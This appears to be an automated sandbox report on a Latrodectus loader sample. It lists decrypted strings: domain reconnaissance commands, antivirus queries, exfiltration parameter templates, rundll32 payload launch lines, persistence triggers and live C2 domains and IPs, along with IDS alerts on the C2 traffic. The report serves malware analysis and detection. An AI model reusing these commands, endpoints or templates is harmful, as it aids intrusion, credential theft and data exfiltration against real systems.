Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c net view /all /domain
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &ipconfig=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c net config workstation
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c whoami /groups
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &systeminfo=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &domain_trusts=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &domain_trusts_all=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &net_view_all_domain=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &net_view_all=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &net_group=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &wmic=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &net_config_ws=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &net_wmic_av=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &whoami_group=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "pid":
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "%d",
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "proc":
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "%s",
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "subproc": [
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &proclist=[
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "pid":
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "%d",
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "proc":
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "%s",
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "subproc": [
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &desklinks=[
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: .
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "%s"
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Update_%x
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Custom_update
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: .dll
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: .exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Error
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: runnung
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: %s/%s
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: front
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /files/
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Lambda
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Cookie:
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: POST
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: GET
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: curl/7.88.1
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: CLEARURL
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: URLS
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: COMMAND
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: ERROR
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: [{"data":"
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: "}]
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &dpost=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: https://reateberam.com/test/
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: https://dogirafer.com/test/
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: \*.dll
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: AppData
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Desktop
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Startup
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Personal
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Local AppData
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: <html>
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: <!DOCTYPE
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: %s%d.dll
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Content-Length: 0
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Content-Type: application/dns-message
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: Content-Type: application/ocsp-request
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: 12345
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: 12345
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &stiller=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: %s%d.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: %x%x
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &mac=
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: %02x
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: :%02x
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &computername=%s
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: &domain=%s
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: LogonTrigger
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: \Registry\Machine\
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: TimeTrigger
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: PT0H%02dM
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: PT0S
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: \update_data.dat

Source: C:\Windows\explorer.exe	Code function: 9_2_0E625E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,	9_2_0E625E5C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E625FE4 CryptUnprotectData,	9_2_0E625FE4
Source: C:\Windows\explorer.exe	Code function: 9_2_0E628568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,	9_2_0E628568
Source: C:\Windows\explorer.exe	Code function: 9_2_0E62453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,	9_2_0E62453C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E626078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,	9_2_0E626078

Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49904 version: TLS 1.2

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI17D3.tmp, 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, MSI17D3.tmp, 00000003.00000000.1684254663.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, fes.msi, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI17D3.tmp, 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, MSI17D3.tmp, 00000003.00000000.1684254663.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, fes.msi, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CEB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00CEB02D
Source: C:\Windows\explorer.exe	Code function: 9_2_0311A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,	9_2_0311A8E0
Source: C:\Windows\explorer.exe	Code function: 9_2_03112B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_03112B28
Source: C:\Windows\explorer.exe	Code function: 9_2_031204C0 FindFirstFileW,	9_2_031204C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E626604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	9_2_0E626604
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6216F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_0E6216F4

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49851 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49894 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49886 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49869 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49861 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49926 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49904 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49918 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49878 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49933 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49940 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49962 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49948 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49956 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49994 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50002 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50008 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49979 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49972 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50016 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50025 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50029 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50036 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50034 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50038 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50041 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50043 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50033 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50037 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50040 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50030 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49986 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50042 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50049 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50045 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50048 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50046 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50035 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50031 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50047 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50039 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50044 -> 104.21.68.89:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 94.232.43.224 6542	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://reateberam.com/test/
Source: Malware configuration extractor	URLs: https://dogirafer.com/test/

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 103.57.249.207:6542
Source: global traffic	TCP traffic: 192.168.2.4:49732 -> 94.232.43.224:6542

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SITINETWORS-IN-APSITINETWORKSLIMITEDIN SITINETWORS-IN-APSITINETWORKSLIMITEDIN
Source: Joe Sandbox View	ASN Name: WELLWEBNL WELLWEBNL

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49851 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49861 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49869 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49878 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49886 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49894 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49904 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49918 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49926 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49933 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49948 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49972 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49979 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49986 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49994 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50002 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50008 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50016 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50025 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50030 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50029 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50031 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50034 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50036 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50033 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50039 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50041 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50042 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50040 -> 104.21.68.89:443
